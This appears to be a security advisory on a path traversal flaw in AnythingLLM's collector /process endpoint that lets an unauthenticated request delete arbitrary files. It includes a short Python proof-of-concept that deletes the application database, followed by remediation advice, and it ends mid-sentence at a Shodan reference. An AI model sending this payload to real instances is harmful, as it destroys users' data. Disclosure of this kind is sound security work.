The /process endpoint of the Python API (in collector/api.py) expects a POST request with a JSON parameter named filename:
@api.route("/process", methods=["POST"])
def process_file():
    content = request.json
    target_filename = content.get("filename")
    print(f"Processing {target_filename}")
    success, reason = process_single(WATCH_DIRECTORY, target_filename)
    return json.dumps(
        {"filename": target_filename, "success": success, "reason": reason}
    )
The filename is then passed to the process_single function:
def process_single(directory, target_doc):
    if os.path.isdir(f"{directory}/{target_doc}") or target_doc in RESERVED: return (False, "Not a file")
    if os.path.exists(f"{directory}/{target_doc}") is False:
        print(f"{directory}/{target_doc} does not exist.")
        return (False, f"{directory}/{target_doc} does not exist.")
    filename, fileext = os.path.splitext(target_doc)
    if filename in ['.DS_Store'] or fileext == '': return False
    if fileext == '.lock':
        print(f"{filename} is locked - skipping until unlocked")
        return (False, f"{filename} is locked - skipping until unlocked")
    if fileext not in FILETYPES.keys():
        print(f"{fileext} not a supported file type for conversion. It will not be processed.")
        move_source(new_destination_filename=target_doc, failed=True, remove=True)
        return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")
If filename has a file extension and that extension is not among these extensions:
FILETYPES = {
    '.txt': as_text,
    '.md': as_markdown,
    '.pdf': as_pdf,
    '.docx': as_docx,
    '.odt': as_odt,
    '.mbox': as_mbox,
}
and if the filename points to an existing file, the following function is called (with failed=True, remove=True):
def move_source(working_dir='hotdir', new_destination_filename='', failed=False, remove=False):
    if remove and os.path.exists(f"{working_dir}/{new_destination_filename}"):
        print(f"{new_destination_filename} deleted from filesystem")
        os.remove(f"{working_dir}/{new_destination_filename}")
        return
Thus, the file is deleted.
However, since the filename parameter is not sanitized against path traversal, a filename such as ../../server/storage/anythingllm.db can be used to delete the application's database.
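To see why the traversal escapes the working directory, the path built by move_source can be normalized lexically, without touching the filesystem. This is only an illustrative sketch: it reuses the default working_dir value ('hotdir') and the example filename from this report, and it relies on posixpath so the result is the same on any platform.

```python
import posixpath

# Values taken from the report: move_source() defaults to working_dir='hotdir'
# and receives the attacker-controlled filename unchanged.
working_dir = "hotdir"
filename = "../../server/storage/anythingllm.db"

# Same string interpolation as in move_source().
built_path = f"{working_dir}/{filename}"

# normpath collapses the ".." segments purely lexically (no filesystem access).
resolved = posixpath.normpath(built_path)

print(built_path)
print(resolved)
```

The first ".." cancels out hotdir and the second one climbs above the directory the process runs from, so the path handed to os.remove no longer points inside the working directory.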
# PoC.py
import requests

if __name__ == "__main__":
    server_ip = "127.0.0.1"
    file_to_delete = "../../server/storage/anythingllm.db"
    data = {"filename": file_to_delete}
    requests.post(f"http://{server_ip}:8888/process", json=data)
For filename parameters, Flask relies on a function named secure_filename (provided by Werkzeug) to handle filenames safely; its documentation describes the exact behavior. The function os.path.basename could also be used.
Moreover, it may be better practice to build paths with os.path.join instead of interpolating or concatenating strings.
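A minimal sketch of this kind of sanitization, using only the standard library, could look like the following. The helper name resolve_inside is hypothetical and not part of the project's code; it combines os.path.basename with a containment check after resolving the path. secure_filename from werkzeug.utils could be used in place of os.path.basename.

```python
import os


def resolve_inside(base_dir: str, user_filename: str) -> str:
    """Return an absolute path for user_filename inside base_dir, or raise ValueError.

    Hypothetical helper for illustration only; not part of the project's code.
    """
    # Drop any directory components supplied by the client.
    name = os.path.basename(user_filename)
    if name in ("", ".", ".."):
        raise ValueError("invalid filename")

    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))

    # Defence in depth: once symlinks are resolved, the file must still be under base.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the base directory")
    return candidate
```

Under these assumptions, process_file could call resolve_inside(WATCH_DIRECTORY, target_filename) before doing anything else and reject the request when ValueError is raised. With the filename from the PoC, the helper returns a path to anythingllm.db inside the watch directory rather than the database under server/storage.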
In the documentation (collector/README.md), the following command is given to run the Python API:
flask run --host '0.0.0.0' --port 8888
However, simply listening on 127.0.0.1 should be enough. The Docker version seems "safe" because only port 3001 is exposed to the host (the API is still reachable from the docker0 interface on the host, but the attacker would need to be logged in to the server).
With the manual installation method, however, this may result in a Python API exposed to the Internet. Here is an example of an instance exposed to the Internet on Shodan: